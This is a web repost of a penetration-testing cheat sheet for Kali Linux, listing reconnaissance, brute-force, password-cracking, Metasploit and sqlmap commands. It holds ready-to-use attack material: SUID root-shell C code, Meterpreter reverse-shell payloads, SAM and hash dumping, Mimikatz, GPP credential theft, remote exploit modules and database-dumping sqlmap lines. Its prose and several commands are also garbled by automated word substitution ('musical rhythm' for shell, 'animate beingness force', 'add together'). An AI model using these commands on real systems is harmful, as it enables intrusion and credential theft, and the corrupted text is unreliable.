Penetration testing (also called pen testing) is the exercise of testing a reckoner system, network or Web application to regain vulnerabilities that an assaulter could exploit.
Kali Linux Cheat Sheet for Penetration testers is a high bird overview for typical penetration testing surround ranging from nmap, sqlmap, ipv4, enumeration, fingerprinting etc. Always persuasion human being pages if yous are inwards uncertainty or the commands are non working equally outlined hither (can live OS based, version based changes etc.) for the operating arrangement yous are using (such equally BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu etc.). I’ve also referenced roughly guides that I institute useful inwards unlike sections as well as it powerfulness come upwards inwards handy.
Recon as well as Enumeration
NMAP Commands
Nmap (“Network Mapper”) is a costless as well as opened upwards source utility for network uncovering as well as safety auditing. Many systems as well as network administrators also regain it useful for tasks such equally network inventory, managing service upgrade schedules, as well as monitoring host or service uptime. Nmap uses raw IP packets inwards novel ways to create upwards one's heed what hosts are available on the network, what services (application advert as well as version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are inwards use, as well as dozens of other characteristics. It was designed to speedily scan large networks, but industrial plant fine against unmarried hosts. Nmap runs on all major reckoner operating systems, as well as official binary packages are available for Linux, Windows, as well as Mac OS X.
| Command | Description |
|---|---|
| nmap -v -sS -A -T4 target | Nmap verbose scan, runs syn stealth, T4 timing (should live ok on LAN), OS as well as service version info, traceroute as well as scripts against services |
| nmap -v -sS -p–A -T4 target | As to a higher house but scans all TCP ports (takes a lot longer) |
| nmap -v -sU -sS -p- -A -T4 target | As to a higher house but scans all TCP ports as well as UDP scan (takes fifty-fifty longer) |
| nmap -v -p 445 –script=smb-check-vulns –script-args=unsafe=1 192.168.1.X | Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may campaign knockover |
| ls /usr/share/nmap/scripts/* | grep ftp | Search nmap scripts for keywords |
Router hack using nmap here.
SMB enumeration
In reckoner networking, Server Message Block (SMB), ane version of which was also known equally Common Internet File System (CIFS, /ˈsɪfs/), operates equally an application-layer network protocol mainly used for providing shared access to files, printers, as well as series ports as well as miscellaneous communications betwixt nodes on a network
| Command | Description |
|---|---|
| nbtscan 192.168.1.0/24 | Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios advert as well as regain customer workgroup / domain |
| enum4linux -a target-ip | Do Everything, runs all options (find windows customer domain / workgroup) apart from lexicon based part advert guessing |
Other Host Discovery
Other methods of host discovery, that don’t usage nmap…
| Command | Description |
|---|---|
| netdiscover -r 192.168.1.0/24 | Discovers IP, MAC Address as well as MAC vendor on the subnet from ARP, helpful for confirming you’re on the correct VLAN at $client site |
SMB Enumeration
Enumerate Windows shares / Samba shares.
| Command | Description |
|---|---|
| nbtscan 192.168.1.0/24 | Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios advert as well as regain customer workgroup / domain |
| enum4linux -a target-ip | Do Everything, runs all options (find windows customer domain / workgroup) apart from lexicon based part advert guessing |
Python Local Web Server
Python local spider web server command, handy for serving upwards shells as well as exploits on an attacking machine.
| Command | Description |
|---|---|
| python -m SimpleHTTPServer 80 | Run a basic http server, great for serving upwards shells etc |
Mounting File Shares
How to mountain NFS / CIFS, Windows as well as Linux file shares.
| Command | Description |
|---|---|
| mount 192.168.1.1:/vol/share /mnt/nfs | Mount NFS part to /mnt/nfs |
| mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs | Mount Windows CIFS / SMB part on Linux at /mnt/cifs if yous take password it volition prompt on the CLI (more secure equally it wont destination upwards inwards bash_history) |
| net usage Z: \\win-server\share password /user:domain\janedoe /savecred /p:no | Mount a Windows part on Windows from the dominance line |
| apt-get install smb4k -y | Install smb4k on Kali, useful Linux GUI for browsing SMB shares |
Basic FingerPrinting
A device fingerprint or machine fingerprint or browser fingerprint is information collected close a remote electronic computer for the role of identification. Fingerprints tin lavatory live used to fully or partially seat private users or devices fifty-fifty when cookies are turned off.
| Command | Description |
|---|---|
| nc -v 192.168.1.1 25 telnet 192.168.1.1 25 | Basic versioning / fingerprinting via displayed banner |
SNMP Enumeration
SNMP enumeration is the procedure of using SNMP to enumerate user accounts on a target system. SNMP employs 2 major types of software components for communication: the SNMP agent, which is located on the networking device, as well as the SNMP administration station, which communicates amongst the agent.
| Command | Description |
|---|---|
| snmpcheck -t 192.168.1.X -c public snmpwalk -c world -v1 192.168.1.X 1| snmpenum -t 192.168.1.X onesixtyone -c names -i hosts | SNMP enumeration |
DNS Zone Transfers
| Command | Description |
|---|---|
| nslookup -> fix type=any -> ls -d blah.com | Windows DNS zone transfer |
| dig axfr blah.com @ns1.blah.com | Linux DNS zone transfer |
DNSRecon
DNSRecon provides the powerfulness to perform:
- Check all NS Records for Zone Transfers
- Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF as well as TXT)
- Perform mutual SRV Record Enumeration. Top Level Domain (TLD) Expansion
- Check for Wildcard Resolution
- Brute Force subdomain as well as host Influenza A virus subtype H5N1 as well as AAAA records given a domain as well as a wordlist
- Perform a PTR Record lookup for a given IP Range or CIDR
- Check a DNS Server Cached records for A, AAAA as well as CNAME Records provided a listing of host records inwards a text file to check
- Enumerate Common mDNS records inwards the Local Network Enumerate Hosts as well as Subdomains using Google
DNS Enumeration Kali - DNSReconroot: #
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
HTTP / HTTPS Webserver Enumeration
| Command | Description |
|---|---|
| nikto -h 192.168.1.1 | Perform a nikto scan against target |
| dirbuster | Configure via GUI, CLI input doesn’t function most of the time |
Packet Inspection
| Command | Description |
|---|---|
| tcpdump tcp port lxxx -w output.pcap -i eth0 | tcpdump for port lxxx on interface eth0, outputs to output.pcap |
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
| Command | Description |
|---|---|
| python /usr/share/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX | Enumerate users from SMB |
| ridenum.py 192.168.XXX.XXX 500 50000 dict.txt | RID bicycle SMB / enumerate users from SMB |
SNMP User Enumeration
| Command | Description |
|---|---|
| snmpwalk world -v1 192.168.X.XXX 1 |grep 77.1.2.25 |cut -d” “ -f4 | Enmerate users from SNMP |
| python /usr/share/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX | Enmerate users from SNMP |
| nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) | Search for SNMP servers amongst nmap, grepable output |
Passwords
Wordlists
| Command | Description |
|---|---|
| /usr/share/wordlists | Kali give-and-take lists |
Massive wordlist hither at g0tm1lk’s blog
Brute Forcing Services
Hydra FTP Brute Force
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is really fast as well as flexible, as well as novel modules are tardily to add. This tool makes it possible for researchers as well as safety consultants to exhibit how tardily it would live to gain unauthorized access to a arrangement remotely. On Ubuntu it tin lavatory live installed from the synaptic packet manager. On Kali Linux, it is per-installed.
| Command | Description |
|---|---|
| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V | Hydra FTP animate beingness force |
Hydra POP3 Brute Force
| Command | Description |
|---|---|
| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V | Hydra POP3 animate beingness force |
Hydra SMTP Brute Force
| Command | Description |
|---|---|
| hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V | Hydra SMTP animate beingness force |
Use -t to limit concurrent connections, example: -t 15
Cracking password using Hydra guide here
Password Cracking
John The Ripper – JTR
John the Ripper is unlike from tools similar Hydra. Hydra does blind brute-forcing yesteryear trying username/password combinations on a service daemon similar ftp server or telnet server. John withal needs the hash first. So the greater challenge for a hacker is to start teach the hash that is to live cracked. Now a days hashes are to a greater extent than easily crackable using costless rainbow tables available online. Just teach to ane of the sites, submit the hash as well as if the hash is made of a mutual word, therefore the site would exhibit the give-and-take almost instantly. Rainbow tables basically shop mutual words as well as their hashes inwards a large database. Larger the database, to a greater extent than the words covered.
| Command | Description |
|---|---|
| john –wordlist=/usr/share/wordlists/rockyou.txt hashes | JTR password cracking |
| john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt | JTR forced descrypt corking amongst wordlist |
| john –format=descrypt hash –show | JTR forced descrypt animate beingness forcefulness cracking |
Cracking password using John the Ripper guide here
Exploit Research
Ways to regain exploits for enumerated hosts / services.
| Command | Description |
|---|---|
| searchsploit windows 2003 | grep -i local | Search exploit-db for exploit, inwards this event windows 2003 + local esc |
| site:exploit-db.com exploit gist <= 3 | Use google to search exploit-db.com for exploits |
| grep -R “W7” /usr/share/metasploit-framework /modules/exploit/windows/* | Search metasploit modules using grep – msf search sucks a bit |
Full on guide amongst screenshots for searching exploits here
Compiling Exploits
Identifying if C code is for Windows or Linux
C #includes volition signal which OS should live used to construct the exploit.
| Command | Description |
|---|---|
| process.h, string.h, winbase.h, windows.h, winsock2.h | Windows exploit code |
| arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h | Linux exploit code |
Build Exploit GCC
Compile exploit gcc.
| Command | Description |
|---|---|
| gcc -o exploit exploit.c | Basic GCC compile |
GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 flake binaries on 64 flake attacking machines.
| Command | Description |
|---|---|
| gcc -m32 exploit.c -o exploit | Cross compile 32 flake binary on 64 flake Linux |
Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting inwards a .exe file.
| Command | Description |
|---|---|
| i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe | Compile windows .exe on Linux |
SUID Binary
Often SUID C binary files are required to spawn a musical rhythm equally a superuser, yous tin lavatory update the UID / GID as well as musical rhythm equally required.
below are roughly quick re-create as well as pate examples for diverse shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
TTY Shells
Tips / Tricks to spawn a TTY musical rhythm from a express musical rhythm inwards Linux, useful for running commands similar su from contrary shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'echo os.system('/bin/bash')Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
os.execute('/bin/sh')Spawn TTY Shell from Vi
Run musical rhythm commands from vi:
:!bash
Spawn TTY Shell NMAP
!sh
Metasploit
Metasploit was created yesteryear H. D. Moore inwards 2003 equally a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten inwards Ruby. On Oct 21, 2009, the Metasploit Project announced that it had been acquired yesteryear Rapid7, a safety companionship that provides unified vulnerability administration solutions.
Like comparable commercial products such equally Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit tin lavatory live used to bear witness the vulnerability of reckoner systems or to suspension into remote systems. Like many information safety tools, Metasploit tin lavatory live used for both legitimate as well as unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added 2 opened upwards core proprietary editions called Metasploit Express as well as Metasploit Pro.
Metasploit’s emerging seat equally the de facto exploit evolution framework led to the liberate of software vulnerability advisories frequently accompanied yesteryear a 3rd political party Metasploit exploit module that highlights the exploitability, run a hazard as well as remediation of that exceptional bug. Metasploit 3.0 began to include fuzzing tools, used to regain software vulnerabilities, rather than simply exploits for known bugs. This avenue tin lavatory live seen amongst the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 inwards Nov 2006. Metasploit 4.0 was released inwards August 2011.
Meterpreter Payloads
Windows contrary meterpreter payload
| Command | Description |
|---|---|
| set payload windows/meterpreter/reverse_tcp | Windows contrary tcp payload |
Windows VNC Meterpreter payload
| Command | Description |
|---|---|
| set payload windows/vncinject/reverse_tcp set ViewOnly false | Meterpreter Windows VNC Payload |
Linux Reverse Meterpreter payload
| Command | Description |
|---|---|
| set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Meterpreter Cheat Sheet
Useful meterpreter commands.
| Command | Description |
|---|---|
| upload file c:\\windows | Meterpreter upload file to Windows target |
| download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
| download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
| execute -f c:\\windows\temp\exploit.exe | Meterpreter run .exe on target – handy for executing uploaded exploits |
| execute -f cmd -c | Creates novel channel amongst cmd shell |
| ps | Meterpreter exhibit processes |
| shell | Meterpreter teach musical rhythm on the target |
| getsystem | Meterpreter attempts priviledge escalation the target |
| hashdump | Meterpreter attempts to dump the hashes on the target |
| portfwd add together –l 3389 –p 3389 –r target | Meterpreter create port frontwards to target machine |
| portfwd delete –l 3389 –p 3389 –r target | Meterpreter delete port forward |
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
| Command | Description |
|---|---|
| use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
| use exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
| use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 as well as Server 2008 (x86) Remote Exploit |
Local Windows Metasploit Modules (exploits)
| Command | Description |
|---|---|
| use exploit/windows/local/bypassuac | Bypass UAC on Windows vii + Set target + arch, x86/64 |
Auxilary Metasploit Modules
| Command | Description |
|---|---|
| use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner |
| use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner |
| use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
| use auxiliary/scanner/mysql/mysql_version | Metasploit MSSQL Version Scanner |
| use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Metasploit Powershell Modules
| Command | Description |
|---|---|
| use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module |
| post/windows/manage/powershell/exec_powershell | Metasploit upload as well as run powershell script through a session |
| use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
| use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
| Command | Description |
|---|---|
| run post/windows/gather/win_privs | Metasploit exhibit privileges of electrical flow user |
| use post/windows/gather/credentials/gpp | Metasploit select grip of GPP saved passwords |
| load mimikatz -> wdigest | Metasplit charge Mimikatz |
| run post/windows/gather/local_admin_search_enum | Idenitfy other machines that the supplied domain user has administrative access to |
Networking
TTL Fingerprinting
| Operating System | TTL Size |
|---|---|
| Windows | 128 |
| Linux | 64 |
| Solaris | 255 |
| Cisco / Network | 255 |
IPv4
Classful IP Ranges
E.g Class A,B,C (depreciated)
| Class | IP Address Range |
|---|---|
| Class Influenza A virus subtype H5N1 IP Address Range | 0.0.0.0 – 127.255.255.255 |
| Class B IP Address Range | 128.0.0.0 – 191.255.255.255 |
| Class C IP Address Range | 192.0.0.0 – 223.255.255.255 |
| Class D IP Address Range | 224.0.0.0 – 239.255.255.255 |
| Class due east IP Address Range | 240.0.0.0 – 255.255.255.255 |
IPv4 Private Address Ranges
| Class | Range |
|---|---|
| Class Influenza A virus subtype H5N1 Private Address Range | 10.0.0.0 – 10.255.255.255 |
| Class B Private Address Range | 172.16.0.0 – 172.31.255.255 |
| Class C Private Address Range | 192.168.0.0 – 192.168.255.255 |
| 127.0.0.0 – 127.255.255.255 |
IPv4 Subnet Cheat Sheet
| CIDR | Decimal Mask | Number of Hosts |
|---|---|---|
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.249 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 512 Host |
| /22 | 255.255.252.0 | 1022 Hosts |
| /21 | 255.255.248.0 | 2046 Hosts |
| /20 | 255.255.240.0 | 4094 Hosts |
| /19 | 255.255.224.0 | 8190 Hosts |
| /18 | 255.255.192.0 | 16382 Hosts |
| /17 | 255.255.128.0 | 32766 Hosts |
| /16 | 255.255.0.0 | 65534 Hosts |
| /15 | 255.254.0.0 | 131070 Hosts |
| /14 | 255.252.0.0 | 262142 Hosts |
| /13 | 255.248.0.0 | 524286 Hosts |
| /12 | 255.240.0.0 | 1048674 Hosts |
| /11 | 255.224.0.0 | 2097150 Hosts |
| /10 | 255.192.0.0 | 4194302 Hosts |
| /9 | 255.128.0.0 | 8388606 Hosts |
| /8 | 255.0.0.0 | 16777214 Hosts |
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if yous teach stranded on Mars as well as demand to communicate amongst NASA.
| ASCII | Character |
|---|---|
| x00 | Null Byte |
| x08 | BS |
| x09 | TAB |
| x0a | LF |
| x0d | CR |
| x1b | ESC |
| x20 | SPC |
| x21 | ! |
| x22 | “ |
| x23 | # |
| x24 | $ |
| x25 | % |
| x26 | & |
| x27 | ` |
| x28 | ( |
| x29 | ) |
| x2a | * |
| x2b | + |
| x2c | , |
| x2d | – |
| x2e | . |
| x2f | / |
| x30 | 0 |
| x31 | 1 |
| x32 | 2 |
| x33 | 3 |
| x34 | 4 |
| x35 | 5 |
| x36 | 6 |
| x37 | 7 |
| x38 | 8 |
| x39 | 9 |
| x3a | : |
| x3b | ; |
| x3c | < |
| x3d | = |
| x3e | > |
| x3f | ? |
| x40 | @ |
| x41 | A |
| x42 | B |
| x43 | C |
| x44 | D |
| x45 | E |
| x46 | F |
| x47 | G |
| x48 | H |
| x49 | I |
| x4a | J |
| x4b | K |
| x4c | L |
| x4d | M |
| x4e | N |
| x4f | O |
| x50 | P |
| x51 | Q |
| x52 | R |
| x53 | S |
| x54 | T |
| x55 | U |
| x56 | V |
| x57 | W |
| x58 | X |
| x59 | Y |
| x5a | Z |
| x5b | [ |
| x5c | \ |
| x5d | ] |
| x5e | ^ |
| x5f | _ |
| x60 | ` |
| x61 | a |
| x62 | b |
| x63 | c |
| x64 | d |
| x65 | e |
| x66 | f |
| x67 | g |
| x68 | h |
| x69 | i |
| x6a | j |
| x6b | k |
| x6c | l |
| x6d | m |
| x6e | n |
| x6f | o |
| x70 | p |
| x71 | q |
| x72 | r |
| x73 | s |
| x74 | t |
| x75 | u |
| x76 | v |
| x77 | w |
| x78 | x |
| x79 | y |
| x7a | z |
CISCO IOS Commands
A collection of useful Cisco IOS commands.
| Command | Description |
|---|---|
| enable | Enters enable mode |
| conf t | Short for, configure terminal |
| (config)# interface fa0/0 | Configure FastEthernet 0/0 |
| (config-if)# ip addr 0.0.0.0 255.255.255.255 | Add ip to fa0/0 |
| (config-if)# ip addr 0.0.0.0 255.255.255.255 | Add ip to fa0/0 |
| (config-if)# trouble vty 0 4 | Configure vty line |
| (config-line)# login | Cisco fix telnet password |
| (config-line)# password YOUR-PASSWORD | Set telnet password |
| # exhibit running-config | Show running config loaded inwards memory |
| # exhibit startup-config | Show sartup config |
| # exhibit version | show cisco IOS version |
| # exhibit session | display opened upwards sessions |
| # exhibit ip interface | Show network interfaces |
| # exhibit interface e0 | Show detailed interface info |
| # exhibit ip route | Show routes |
| # exhibit access-lists | Show access lists |
| # dir file systems | Show available files |
| # dir all-filesystems | File information |
| # dir /all | SHow deleted files |
| # terminal length 0 | No limit on terminal output |
| # re-create running-config tftp | Copys running config to tftp server |
| # re-create running-config startup-config | Copy startup-config to running-config |
Cryptography
Hash Lengths
| Hash | Size |
|---|---|
| MD5 Hash Length | 16 Bytes |
| SHA-1 Hash Length | 20 Bytes |
| SHA-256 Hash Length | 32 Bytes |
| SHA-512 Hash Length | 64 Bytes |
Hash Examples
Likely simply usage hash-identifier for this but hither are roughly event hashes:
| Hash | Example |
|---|---|
| MD5 Hash Example | 8743b52063cd84097a65d1633f5c74f5 |
| MD5 $PASS:$SALT Example | 01dfae6e5d4d90d9892622325959afbe:7050461 |
| MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
| SHA1 Hash Example | b89eaac7e61417341b710b727768294d0e6a277b |
| SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
| SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
| SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b 8e5d8f48a98c3c92df2caba935 |
| SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a7 1f995c1dcc978165399401a6c4 |
| SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4 f0ee75c05963cd9da6ee65ef498:560407001617 |
| SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9 664fbb7adf72492e3c81ebd3e29134d9bc 12212bf83c6840f10e8246b9db54a4 859b7ccd0123d86e5872c1e5082f |
| SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8 d89b8ab65142c9a8fdafb635fa2223c24e5 558fd9313e8995019dcbec1fb58414 6b7bb12685c7765fc8c0d51379fd |
| SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6ef a72adf8a7a08d7939550c244b237c72c7d4236754 4e826c0c83fe5c02f97c0373b6b1 386cc794bf0d21d2df01bb9c08a |
| NTLM Hash Example | b4b9b02e6f09a9bd760f388b67351e2b |
Identify HASH as well as corking password using Wireshark guide here
SQLMap Examples
sqlmap is an opened upwards source penetration testing tool that automates the procedure of detecting as well as exploiting SQL injection flaws as well as taking over of database servers. It comes amongst a powerful detection engine, many niche features for the ultimate penetration tester as well as a wide make of switches lasting from database fingerprinting, over information fetching from the database, to accessing the underlying file arrangement as well as executing commands on the operating arrangement via out-of-band connections.
| Command | Description |
|---|---|
| sqlmap -u http://meh.com –forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3 | Automated sqlmap scan |
| sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read=”/var/www/blah.php” | Targeted sqlmap scan |
| sqlmap -u “http://meh.com/meh.php?id=1” –dbms=mysql –tech=U –random-agent –dump | Scan url for spousal human relationship + mistake based injection amongst mysql backend and usage a random user agent + database dump |
| sqlmap -o -u “http://meh.com/form/” –forms | sqlmap depository fiscal establishment stand upwards for shape for injection |
| sqlmap -o -u “http://meh/vuln-form” –forms -D database-name -T users –dump | sqlmap dump as well as scissure hashes for tabular array users on database-name. |
Source:
This article originally appeared on Penetration Testing Tools Cheat Sheet.
